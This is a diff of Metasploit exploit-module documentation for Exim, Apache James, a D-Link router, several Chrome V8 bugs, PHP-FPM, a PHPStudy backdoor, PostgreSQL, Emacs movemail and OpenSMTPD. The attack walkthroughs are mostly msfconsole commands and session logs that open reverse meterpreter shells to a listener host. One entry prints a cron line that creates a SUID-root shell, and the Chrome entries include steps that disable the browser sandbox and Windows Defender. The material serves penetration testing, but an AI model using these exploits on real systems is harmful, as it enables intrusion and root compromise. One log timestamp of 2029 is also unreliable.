 Exim 4.87 - 4.91 Local Privilege Escalation

-This module exploits a flaw found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to command execution with root privileges (CVE-2019-10149). 
+This module exploits a flaw found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to command execution with root privileges (CVE-2019-10149).

 Both meterpreter shell and classic shell are supported. The exploit will upload the specified `payload`, set the suid bit, and execute it to create a new root session. In order for the new session to be a root one, both `PrependSetuid` and `PrependSetgid` must be set to true (which is the default configuration for the exploit), and the `WritableDir` must be mounted without `nosuid`.

@@ -37,10 +37,10 @@ The port that exim is listening to. On most cases it will be port 25 (which is t
 ## ForceExploit

 Force exploit even if the current session is root.
-    
-## SendExpectTimeout

-Timeout per send/expect when communicating with exim.
+## ExpectTimeout
+
+Timeout for Expect when communicating with exim.

 ## WritableDir

@@ -54,9 +54,9 @@ A directory where we can write files (default is /tmp).
 ```
 meterpreter > getuid
 Server username: uid=1000, gid=1000, euid=1000, egid=1000
-meterpreter > 
-Background session 1? [y/N]  
-msf5 exploit(multi/handler) > use exploit/linux/local/exim4_deliver_message_priv_esc 
+meterpreter >
+Background session 1? [y/N]
+msf5 exploit(multi/handler) > use exploit/linux/local/exim4_deliver_message_priv_esc
 msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set session 1
 session => 1
 msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set lhost 192.168.0.50
@@ -71,7 +71,7 @@ msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > check
 [*] The target appears to be vulnerable.
 msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > exploit

-[*] Started reverse TCP handler on 192.168.0.50:13371 
+[*] Started reverse TCP handler on 192.168.0.50:13371
 [*] Payload sent, wait a few seconds...
 [*] Sending stage (985320 bytes) to 192.168.0.80
 [*] Meterpreter session 2 opened (192.168.0.50:13371 -> 192.168.0.80:45562) at 2019-07-07 23:46:37 +0100
@@ -0,0 +1,155 @@
+## Vulnerable Application
+  This module exploits a vulnerability that exists due to a lack of input validation when creating a user in Apache James 2.3.2.
+  By creating a user with a directory traversal payload as the username, commands can be written to a given directory/file.
+  Instructions for installing the vulnerable application for testing can be found here:
+  https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf
+
+## Verification Steps
+  __1.__ Start msfconsole
+
+  __2.__ DO: Load module exploit/linux/smtp/apache_james_exec
+
+  __3.__ DO: Set the remote and local options: rhosts, lhosts, lport
+
+  __4.__ DO: Set the preferred payload
+
+  __5.__ DO: Run the check method to determine vulnerability
+
+  __6.__ DO: Run the exploit
+
+  __7.__ The payload will connect to the listener if the exploit is successful
+
+## Options
+  **USERNAME:**  The administrator username for Apache James 2.3.2 remote administration tool. By default this is 'root'.
+
+  **PASSWORD:**  The administrator password for Apache James 2.3.2 remote administration tool. By default this is 'root'.
+
+  **ADMINPORT:**  The port for Apache James 2.3.2 remote administration tool. By default this is '4555'.
+
+  **RHOSTS:**  The IP address of the vulnerable server.
+
+  **RPORT:**  The port number of the SMTP service.
+
+  **POP3PORT** The port for the POP3 Apache James Service.  By default this '110'.
+
+## Scenarios
+  **If using Cron exploitation method:** This method allows for automatic execution of the payload with no user interaction
+  required and gives the attacker root privileges. It will also attempt to automatically cleanup the malicious user and the
+  mail objects.
+
+  __1.__ Load the module:
+
+```
+  msf5 > use exploit/linux/smtp/apache_james_exec
+```
+
+  __2.__ Set remote and local options:
+
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > set target 1
+  target => 1
+  msf5 exploit(linux/smtp/apache_james_exec) > set rhosts  192.168.224.169
+  rhosts =>  192.168.224.169
+
+  msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167
+  lhost => 192.168.224.167
+  msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444
+  lport => 4444
+```
+
+  __3.__ Set payload:
+
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp
+  payload => linux/x64/meterpreter/reverse_tcp
+```
+
+  __4.__ Check version and run exploit:
+
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > check
+  [*] 192.168.224.164:25 - The target appears to be vulnerable.
+  msf5 exploit(linux/smtp/apache_james_exec) > exploit
+  
+  [*] Started reverse TCP handler on 192.168.224.167:4444
+  [+] 192.168.224.169:25 - Waiting 60 seconds for cron to execute payload
+  [*] Sending stage (3021284 bytes) to 192.168.224.169
+  [*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.169:38694) at 2020-02-02 16:30:02 -0800
+  [*] 192.168.224.169:25 - Command Stager progress - 100.00% done (812/812 bytes)
+
+  meterpreter >
+```
+
+  ---------------------------------------------------------------------------------------------
+  **If using Bash Completion:** This method may be preferable if targeting a linux operating system such as some versions of Ubuntu that
+  fails to run the cron method for exploitation. This exploitation method will leave an Apache James mail object artifact in the
+  /etc/bash_completion.d directory and the malicious user account.
+
+  __1.__ Load the module:
+
+```
+  msf5 > use exploit/linux/smtp/apache_james_exec
+```
+
+  __2.__ Set remote and local options:
+
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > set target 0
+  target => 0
+  msf5 exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.164
+  rhosts => 192.168.224.164
+
+  msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167
+  lhost => 192.168.224.167
+  msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444
+  lport => 4444
+```
+
+  __3.__ Set payload:
+
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp
+  payload => linux/x64/meterpreter/reverse_tcp
+```
+
+  __4.__ Check version and run exploit:
+
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > check
+  [*] 192.168.224.164:25 - The target appears to be vulnerable.
+  msf5 exploit(linux/smtp/apache_james_exec) > exploit
+
+  [*] 192.168.224.164:25 - Command Stager progress - 100.00% done (812/812 bytes)
+```
+
+  __5.__ Set up and run listener (Can be done before running exploit):
+
+```
+  msf5 exploit(linux/smtp/apache_james_exec) > use exploit/multi/handler
+  msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
+  payload => linux/x64/meterpreter/reverse_tcp
+  msf5 exploit(multi/handler) > set lport 4444
+  lport => 4444
+  msf5 exploit(multi/handler) > set lhost 192.168.224.167
+  lhost => 192.168.224.167
+
+  msf5 exploit(multi/handler) > run
+
+  [*] Started reverse TCP handler on 192.168.224.167:4444
+  [*] Sending stage (3021284 bytes) to 192.168.224.164
+  [*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.164:34752) at 2020-01-18 18:25:14 -0800
+
+  meterpreter >
+```
+
+## Targets
+```
+  Id  Name 
+  --  ----
+  0   Bash Completion
+  1   Cron
+```
+
+## References
+  1. <https://www.exploit-db.com/exploits/35513>
+  2. <https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf>
@@ -0,0 +1,46 @@
+## Vulnerable Application
+
+### Introduction
+
+This module exploits CVE-2019–20215, an unauthenticated remote injection of operating system commands.
+The vulnerability was found in the ssdpcgi() function, and the payload can be injected through either the UUID
+or URN headers of a M-SEARCH UPnP request.
+
+Get a [D-Link router/vulnerable firmware](https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10147),
+or download firmware versions 1.06 or 1.05 and run them on firmadyne or similar emulation frameworks.
+
+## Verification Steps
+
+1. Set up router/emulated device
+2. Start `msfconsole`
+3. Do: `use exploit/linux/http/dlink_dir859_exec_ssdpcgi`
+4. Do: `set RHOSTS <router_ip>`
+5. Do: `set LHOST <local_ip>`
+6. Do: `set TARGET <URN/UUID>`
+7. Do: `run`
+8. You should get a session as `root`.
+
+## Options
+
+**VECTOR**
+
+This option denotes which header will be used in the request (UUID or URN)
+that triggers the vulnerability.
+
+## Scenarios
+
+### D-link DIR-859 Firmware 1.05
+
+```
+msf5 exploit(linux/http/dlink_dir859_exec_ssdpcgi) > run 
+[*] Started reverse TCP handler on 192.168.0.2:4444 
+[*] Using URL: http://0.0.0.0:8080/38YWEX2
+[*] Local IP: http://192.168.70.28:8080/38YWEX2
+[*] Target Payload URN
+[*] Client 192.168.0.1 (Wget) requested /38YWEX2
+[*] Sending payload to 192.168.0.1 (Wget)
+[*] Command Stager progress - 100.00% done (110/110 bytes)
+[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.1:41057) at 2029-12-31 14:15:22 -0300
+[*] Server stopped.
+meterpreter > 
+```
@@ -0,0 +1,61 @@
+This module exploits an issue in Chrome 73.0.3683.86 (64 bit). The exploit corrupts the length of a float in order to modify the backing store of a typed array. The typed array can then be used to read and write arbitrary memory. 
+The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload.
+
+**The payload is executed within the sandboxed renderer process, so the browser must be run with the --no-sandbox option for the payload to work correctly.**
+
+## Vulnerable Application
+
+The module is compatible with any 64bit Google Chrome (version 72 or 73), on any platform (macOS, Linux or Windows), however the code that writes the shellcode into the rwx region (wasm_rwx_addr) may need to be modified.
+
+**Vulnerable Application Installation Steps**
+
+You can download a vulnerable Chrome version from this location:
+[https://www.filepuma.com/download/google_chrome_64bit_73.0.3683.86-21785/](https://www.filepuma.com/download/google_chrome_64bit_73.0.3683.86-21785/)
+
+You should ensure that application does not update itself to the latest version (by disabling automatic updates or simply not connecting to the internet).
+You may also need to disable Windows Defender.
+
+## Verification Steps
+
+1. Do: ```use exploit/multi/browser/chrome_array_map```
+2. Do: ```set payload windows/x64/meterpreter/reverse_tcp```
+2. Do: ```set LHOST [IP]```
+3. Do: ```set SRVHOST [IP]```
+3. Do: ```set URIPATH / [PATH]```
+4. Do: ```run```
+
+## Scenarios
+
+### Windows 10 and Google Chrome 73.0.3683.86 with --no-sandbox
+
+Start Google Chrome without a sandbox:
+```"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox```
+
+```
+msf5 > use exploit/multi/browser/chrome_array_map
+msf5 exploit(multi/browser/chrome_array_map) > set SRVHOST 192.168.56.1
+SRVHOST => 192.168.56.1
+msf5 exploit(multi/browser/chrome_array_map) > set URIPATH /
+URIPATH => /
+msf5 exploit(multi/browser/chrome_array_map) > set payload windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+msf5 exploit(multi/browser/chrome_array_map) > set LHOST 192.168.56.1
+LHOST => 192.168.56.1
+msf5 exploit(multi/browser/chrome_array_map) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf5 exploit(multi/browser/chrome_array_map) >
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] Using URL: http://192.168.56.1:8080/
+[*] Server started.
+[*] 192.168.56.3     chrome_array_map - Sending / to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
+[*] Sending stage (206403 bytes) to 192.168.56.3
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:49675) at 2020-02-29 15:07:06 +0800
+
+msf5 exploit(multi/browser/chrome_array_map) > sessions 1
+[*] Starting interaction with 1...
+
+meterpreter > pwd
+C:\Program Files (x86)\Google\Chrome\Application\73.0.3683.86
+meterpreter >
+```
@@ -0,0 +1,65 @@
+This module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The exploit corrupts the length of a float array (float_rel), which can then be used for out of bounds read and write on adjacent memory.
+The relative read and write is then used to modify a UInt64Array (uint64_aarw) which is used for read and writing from absolute memory.
+The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode.
+
+**The payload is executed within the sandboxed renderer process, so the browser must be run with the --no-sandbox option for the payload to work correctly.**
+
+## Vulnerable Application
+
+The module is compatible with any 64bit Google Chrome (version 80), on any platform (macOS, Linux or Windows), however the code that writes the shellcode into the rwx region (wasm_rwx_addr) may need to be modified for different versions.
+
+**Vulnerable Application Installation Steps**
+
+You can download a vulnerable Chrome version from this location:
+[https://www.filepuma.com/download/google_chrome_64bit_80.0.3987.87-24545/](https://www.filepuma.com/download/google_chrome_64bit_80.0.3987.87-24545/)
+
+You should ensure that application does not update itself to the latest version (by disabling automatic updates or simply not connecting to the internet).
+You may also need to disable Windows Defender.
+
+## Verification Steps
+
+1. Do: ```use exploit/multi/browser/chrome_jscreate_sideeffect```
+2. Do: ```set payload windows/x64/meterpreter/reverse_tcp```
+2. Do: ```set LHOST [IP]```
+3. Do: ```set SRVHOST [IP]```
+3. Do: ```set URIPATH / [PATH]```
+4. Do: ```run```
+
+## Scenarios
+
+### Windows 10 and Google Chrome 80.0.3987.87 with --no-sandbox
+
+Start Google Chrome without a sandbox:
+
+```"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox```
+
+```
+msf5 > use exploit/multi/browser/chrome_jscreate_sideeffect
+msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set URIPATH /
+URIPATH => /
+msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set SRVHOST 192.168.56.1
+SRVHOST => 192.168.56.1
+msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
+PAYLOAD => windows/x64/meterpreter/reverse_tcp
+msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > set LHOST 192.168.56.1
+LHOST => 192.168.56.1
+msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > exploit
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf5 exploit(multi/browser/chrome_jscreate_sideeffect) >
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] Using URL: http://192.168.56.1:8080/
+[*] Server started.
+
+msf5 exploit(multi/browser/chrome_jscreate_sideeffect) >
+[*] 192.168.56.3     chrome_jscreate_sideeffect - Sending / to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36
+[*] Sending stage (206403 bytes) to 192.168.56.3
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:49677) at 2020-03-04 21:22:38 +0800
+
+msf5 exploit(multi/browser/chrome_jscreate_sideeffect) > sessions 1
+[*] Starting interaction with 1...
+
+meterpreter > pwd
+C:\Program Files (x86)\Google\Chrome\Application\80.0.3987.87
+meterpreter >
+```
@@ -0,0 +1,61 @@
+This modules exploits a type confusion in Google Chromes JIT compiler. The Object.create operation can be used to cause a type confusion between a PropertyArray and a NameDictionary.
+The type confusion can be used to construct a arbitrary read/write memory primitive, which is used to write shellcode into rwx region of a WebAssembly object.
+
+**This module does not contain an exploit to escape the sandbox, so you must launch Google Chrome with the --no-sandbox option**
+
+## Vulnerable Application
+
+The module is compatible with any 64bit Google Chrome (version 67, 68 or 69), on any platform (macOS, Linux or Windows), however the code that writes the shellcode into the rwx region (wasm_rwx_addr) may need to be modified.
+
+**Vulnerable Application Installation Steps**
+
+You can download a vulnerable Chrome version from this location:
+[https://www.filepuma.com/download/google_chrome_64bit_69.0.3497.100-20128/](https://www.filepuma.com/download/google_chrome_64bit_69.0.3497.100-20128/)
+
+You should ensure that application does not update itself to the latest version (by disabling automatic updates or simply not connecting to the internet).
+You may also need to disable Windows Defender.
+
+## Verification Steps
+
+1. Do: ```use exploit/multi/browser/chrome_object_create```
+2. Do: ```set payload windows/x64/meterpreter/reverse_tcp```
+2. Do: ```set LHOST [IP]```
+3. Do: ```set SRVHOST [IP]```
+3. Do: ```set URIPATH / [PATH]```
+4. Do: ```run```
+
+## Scenarios
+
+### Windows 10 and Google Chrome 69.0.3497.100 with --no-sandbox
+
+Start Google Chrome without a sandbox:
+```"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox```
+
+```
+msf5 > use exploit/multi/browser/chrome_object_create
+msf5 exploit(multi/browser/chrome_object_create) > set SRVHOST 192.168.56.1
+SRVHOST => 192.168.56.1
+msf5 exploit(multi/browser/chrome_object_create) > set URIPATH /
+URIPATH => /
+msf5 exploit(multi/browser/chrome_object_create) > set payload windows/x64/meterpreter/reverse_tcp
+payload => windows/x64/meterpreter/reverse_tcp
+msf5 exploit(multi/browser/chrome_object_create) > set LHOST 192.168.56.1
+LHOST => 192.168.56.1
+msf5 exploit(multi/browser/chrome_object_create) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf5 exploit(multi/browser/chrome_object_create) >
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] Using URL: http://192.168.56.1:8080/
+[*] Server started.
+[*] 192.168.56.3     chrome_object_create - Sending / to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
+[*] Sending stage (206403 bytes) to 192.168.56.3
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:49682) at 2020-02-29 14:29:06 +0800
+
+msf5 exploit(multi/browser/chrome_object_create) > sessions 1
+[*] Starting interaction with 1...
+
+meterpreter > pwd
+C:\Program Files (x86)\Google\Chrome\Application\69.0.3497.100
+meterpreter >
+```
@@ -0,0 +1,170 @@
+This module exploits an underflow vulnerability in versions 7.1.x below 7.1.33,
+7.2.x below 7.2.24 and 7.3.x below 7.3.11 of PHP-FPM on Nginx. Only servers
+with certains Nginx + PHP-FPM configurations are exploitable. This is a port of
+the original neex's exploit code (see refs.). First, it detects the correct
+parameters (Query String Length and custom header length) needed to trigger
+code execution. This step determines if the target is actually vulnerable
+(Check method). Then, the exploit sets a series of PHP INI directives to create
+a file (`/tmp/a`) locally on the target, which enables code execution through a
+query string parameter (`?a=<cmd>`). This is used to execute normal payload
+stagers. Finally, this module does some cleanup by killing local PHP-FPM
+workers (those are spawned automatically once killed) and removing the created
+local file (`/tmp/a`).
+
+## Vulnerable Application
+- Install Nginx on Linux (`apt-get install nginx`)
+- get the vulnerable PHP:
+
+```
+git clone https://github.com/php/php-src
+# checkout the fix
+git -C php-src checkout ab061f95ca966731b1c84cf5b7b20155c0a1c06a
+# checkout the commit previous to the fix
+git -C php-src checkout HEAD~1
+```
+
+- make sure the default Nginx configuration contains these entries and no
+  script existence checks (like `try_files`):
+
+```
+location ~ [^/]\.php(/|$) {
+  ...
+  fastcgi_split_path_info ^(.+?\.php)(/.*)$;
+  fastcgi_param PATH_INFO       $fastcgi_path_info;
+  fastcgi_pass   php:9000;
+  ...
+}
+```
+
+See original PoC for details: https://github.com/neex/phuip-fpizdam
+
+An easiest way to setup a vulnerable instance is to use the docker
+configuration provided by the author
+(https://github.com/neex/phuip-fpizdam/tree/master/reproducer)
+
+## Verification Steps
+
+  Preparing the target:
+
+  1. `git clone https://github.com/neex/phuip-fpizdam`
+  2. `cd phuip-fpizdam/reproducer/`
+  3. `docker build -t reproduce-cve-2019-11043 .`
+  4. `docker run --rm -p 192.168.6.6:8080:80 --name reproduce-cve-2019-11043 reproduce-cve-2019-11043`
+
+  Running the exploit:
+
+  1. `./msfconsole`
+  2. `use exploit/multi/http/php_fpm_rce`
+  4. `set RHOSTS 192.168.6.6`
+  5. `set RPORT 8080`
+  4. `set TARGETURI /script.php`
+  6. `set PAYLOAD php/meterpreter/reverse_tcp`
+  7. `set LHOST 192.168.6.6`
+  8. `run`
+
+## Options
+
+   **TARGETURI**
+   Path to a PHP page (`/index.php` by default). This must be a valid page.
+
+## Advanced Options
+
+  **MinQSL**
+  Minimum query string length (QSL). The QSL detection engine will iterate
+  starting from this value (1500 by default). This option is required.
+
+  **MaxQSL**
+  Maximum query string length (QSL). The QSL detection engine will iterate
+  until this value is reached (1950 by default). This option is required.
+
+  **QSLHint**
+  Query string length hint. This value will be used as a QSL candidate. Note
+  that setting this value skips the QSL detection.
+
+  **QSLDetectStep**
+  Query string length detect step. The QSL detection engine will iterate with
+  this step value (5 by default). This option is required.
+
+  **MaxQSLCandidates**
+  Maximum query string length candidates. When the number of QSL candidates
+  found during the QSL detection phase is greater than this value (10 by
+  default), this indicates that something went wrong and we were not able to
+  detect the correct values. This option is required.
+
+  **MaxQSLDetectDelta**
+  Maximum query string length detection delta. This value is the maximum
+  distance between the candidate and the extended values (10 by default). For
+  example, with a value of 20 and QSLDetectStep set to 5, candidate [1700] will
+  be extended to [1680, 1685, 1690, 1695, 1700]. This option is required.
+
+  **MaxCustomHeaderLength**
+  Maximum custom header length. This value is the maximum length that will be
+  used for the custom header during the parameters detection (256 by default).
+  This option is required.
+
+  **CustomHeaderLengthHint**
+  Custom header length hint. This value will be used as the custom header
+  length. Note that setting this value skips the custom header length
+  detection.
+
+  **DetectMethod**
+  Method that will be used to detect if the target is vulnerable. Available
+  methods:
+
+  1. `session.auto_start`: this method consist in setting the
+  `session.auto_start` PHP option to 1. If the response contains `PHPSESSID=`
+  set-cookie value, this means the PHP option has been correctly set and the
+  target is vulnerable.
+  2. `output_handler.md5`: this method consist in setting the `output_handler`
+  PHP option to `md5`. If the response is a md5 hash (16 characters), this
+  means the PHP option has been correctly set and the target is vulnerable.
+
+  **OperationMaxRetries**
+  Maximum of operation retries. Each operation will be repeated at most
+  `OperationMaxRetries` times.
+
+## Scenarios
+
+### Ubuntu 18.04 + nginx 1.14.0 + PHP 7.1.33dev (fpm-fcgi) (built: Feb 14 2020 16:48:15)
+
+```
+msf5 > use exploit/multi/http/php_fpm_rce
+msf5 exploit(multi/http/php_fpm_rce) > set RHOSTS 192.168.6.6
+RHOSTS => 192.168.6.6
+msf5 exploit(multi/http/php_fpm_rce) > set RPORT 8080
+RPORT => 8080
+msf5 exploit(multi/http/php_fpm_rce) > set TARGETURI /script.php
+TARGETURI => /script.php
+msf5 exploit(multi/http/php_fpm_rce) > set PAYLOAD php/meterpreter/reverse_tcp
+PAYLOAD => php/meterpreter/reverse_tcp
+msf5 exploit(multi/http/php_fpm_rce) > set LHOST 192.168.6.6
+LHOST => 192.168.6.6
+msf5 exploit(multi/http/php_fpm_rce) > run
+
+[*] Started reverse TCP handler on 192.168.6.6:4444
+[*] Sending baseline query...
+[*] Detecting QSL...
+[+] The target is probably vulnerable. Possible QSLs: [1765]
+[*] Doing sanity check...
+[*] Detecting attack parameters...
+[+] Parameters found: QSL=1760, customh_length=69
+[+] Target is vulnerable!
+[*] Performing attack using php.ini settings...
+[+] Success! Was able to execute a command by appending 'which+which'
+[*] Trying to cleanup /tmp/a...
+[+] Cleanup done!
+[*] Sending payload...
+[*] Sending stage (38288 bytes) to 192.168.6.6
+[*] Meterpreter session 1 opened (192.168.6.6:4444 -> 192.168.6.6:59177) at 2020-02-14 12:03:45 -0600
+[+] Session created
+[*] Remove /tmp/a and kill workers...
+[+] Done!
+
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > sysinfo
+Computer    : 832efebeac57
+OS          : Linux 832efebeac57 4.9.184-linuxkit #1 SMP Tue Jul 2 22:58:16 UTC 2019 x86_64
+Meterpreter : php/linux
+meterpreter >
+```
@@ -0,0 +1,30 @@
+## Description
+
+PHPStudy is free software, it is a one-click installation software, which includes PHP, MySQL, Apache and more. At some point in time, hackers were able to hack into phpStudy and tamper on 2016 and 2018 versions of the software to make it vulnerable to this specific exploit.
+
+## Vulnerable Application
+
+The vulnerability exists in php-5.4.45 and php-5.2.17 service versions in PHPStudy2016 and PHPStudy2018
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do:```use exploit/multi/http/phpstudy_backdoor_rce``` 
+3. Do:```set rhosts <target>```
+4. Do:```run```
+
+If your target is vulnerable, you will get a shell. 
+you should see an output similar to the following
+
+```
+msf5 exploit(multi/http/phpstudy_backdoor_rce) > set rhosts 192.168.56.104
+rhosts => 192.168.56.104
+msf5 exploit(multi/http/phpstudy_backdoor_rce) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[+] Sending shellcode
+[*] Sending stage (38288 bytes) to 192.168.56.104
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.104:49169) at 2020-02-23 10:11:40 +0800
+
+meterpreter > 
+```
@@ -1,20 +1,20 @@
+## Vulnerable Application
+
 This module attempts to create a new table, then execute system commands in the
 context of copying the command output into the table.

 This module should work on all Postgres systems running version 9.3 and above.

-## Vulnerable Application
-
-  Download any version of PostgreSQL from 9.3 to 11.2 (Latest at time of writing)
-  Set up the software and connect as the postgres superuser.
-  Use the techniques described in this blogpost to verify command execution:
-    https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
+Download any version of PostgreSQL from 9.3 to 11.2 (Latest at time of writing)
+Set up the software and connect as the postgres superuser.
+Use the techniques described in this blogpost to verify command execution:
+  https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5

 ## Verification Steps

  You must be able to connect to the PostgreSQL database, and have a valid set of superuser
  credentials, or a user in the 'pg_execute_server_program' group
-  
+
  Exploiting Linux/OSX:

    1. Start msfconsole
@@ -27,7 +27,7 @@ This module should work on all Postgres systems running version 9.3 and above.
    8. set LHOST my.ip.add.ress
    9. set LHOST myport
    10. exploit
-  
+
  Exploiting Windows:

    1. Start msfconsole
@@ -45,31 +45,30 @@ This module should work on all Postgres systems running version 9.3 and above.
    13. set DATABASE postgres
    14. exploit

-
 ## Options

  **TABLENAME**
-  
+
  The name of the table to create in the database, default is set to 'msftesttable', this table will be dropped create a new
  one each time the exploit is run.
-  
+
  **DUMP_TABLE_OUTPUT**

-  If enabled this option will perform a select statement on the created table before it is deleted. This can be used for 
-  debugging if there are problems with a command being executed. 
-  
+  If enabled this option will perform a select statement on the created table before it is deleted. This can be used for
+  debugging if there are problems with a command being executed.
+
  **DATABASE**
-  
+
  Name of the database to connect to
-  
+
  **USERNAME**
-  
+
  A valid username that allows access to the database
-  
+
  **PASSWORD**
-  
+
  A valid password that allows access to the database
-  
+
 ## Scenarios

 ### Exploiting PostgreSQL 11.2 on Linux Ubuntu 18.04
@@ -114,7 +113,7 @@ This module should work on all Postgres systems running version 9.3 and above.
       Id  Name
       --  ----
       0   Automatic
-   
+    
     msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > exploit

    [*] Started reverse TCP handler on 192.168.0.18:4456
@@ -133,10 +132,9 @@ This module should work on all Postgres systems running version 9.3 and above.
    Linux ubuntu 4.15.0-45-generic #48-Ubuntu SMP Tue Jan 29 16:28:13 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
    /usr/lib/postgresql/11/bin/postgres -V
    postgres (PostgreSQL) 11.2 (Ubuntu 11.2-1.pgdg18.04+1)
-   
+
 ### Exploiting PostgreSQL 10.7 on Windows 10

-    
    msf5 exploit(multi/script/web_delivery) > set target 2
    target => 2
    msf5 exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
@@ -1,10 +1,13 @@
-## Introduction
+## Vulnerable Application
+
+### Description

 This module exploits a SUID installation of the Emacs `movemail` utility
 to run a command as root by writing to 4.3BSD's `/usr/lib/crontab.local`.
+
 The vulnerability is documented in Cliff Stoll's book *The Cuckoo's Egg*.

-## Setup
+### Setup

 A Docker environment for 4.3BSD on VAX is available at
 <https://github.com/wvu/ye-olde-bsd>.
@@ -14,7 +17,7 @@ For manual setup, please follow the Computer History Wiki's
 Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
 you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).

-## Targets
+### Targets

 ```
 Id  Name
@@ -22,6 +25,10 @@ Id  Name
 0   /usr/lib/crontab.local
 ```

+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
 ## Options

 **MOVEMAIL**
@@ -34,15 +41,34 @@ If your payload is `cmd/unix/generic` (suggested default), set this to
 the command you want to run as root. The provided default will create a
 SUID-root shell at `/tmp/sh`.

-## Usage
+## Scenarios
+
+### 4.3BSD

 ```
+msf5 > use exploit/unix/local/emacs_movemail
+msf5 exploit(unix/local/emacs_movemail) > show missing
+
+Module options (exploit/unix/local/emacs_movemail):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   yes       The session to run this module on.
+
+
+Payload options (cmd/unix/generic):
+
+   Name  Current Setting  Required  Description
+   ----  ---------------  --------  -----------
+
+msf5 exploit(unix/local/emacs_movemail) > set session -1
+session => -1
 msf5 exploit(unix/local/emacs_movemail) > run

 [*] Setting a sane $PATH: /bin:/usr/bin:/usr/ucb:/etc
-[*] Current shell is /bin/sh
+[-] Current shell is unknown
 [*] $PATH is /bin:/usr/bin:/usr/ucb:/etc
-[+] SUID-root [redacted] found
+[+] SUID-root /etc/movemail found
 [*] Preparing crontab with payload
 * * * * * root cp /bin/sh /tmp && chmod u+s /tmp/sh
 * * * * * root rm -f /usr/lib/crontab.local
@@ -50,12 +76,5 @@ msf5 exploit(unix/local/emacs_movemail) > run
 [+] Writing crontab to /usr/lib/crontab.local
 [!] Please wait at least one minute for effect
 [*] Exploit completed, but no session was created.
-msf5 exploit(unix/local/emacs_movemail) > sessions -1
-[*] Starting interaction with 1...
-
-ls -l /usr/lib/crontab.local /tmp/sh
-/usr/lib/crontab.local not found
-rwsr-xr-x  1 root        23552 Nov 22 15:17 /tmp/sh
-/tmp/sh -c whoami
-root
+msf5 exploit(unix/local/emacs_movemail) >
 ```
@@ -0,0 +1,139 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits an out-of-bounds read of an attacker-controlled
+string in OpenSMTPD's MTA implementation to execute a command as the
+root or nobody user, depending on the kind of grammar OpenSMTPD uses.
+
+### Setup
+
+1. Download [OpenBSD 6.6](https://cdn.openbsd.org/pub/OpenBSD/6.6/amd64/install66.iso)
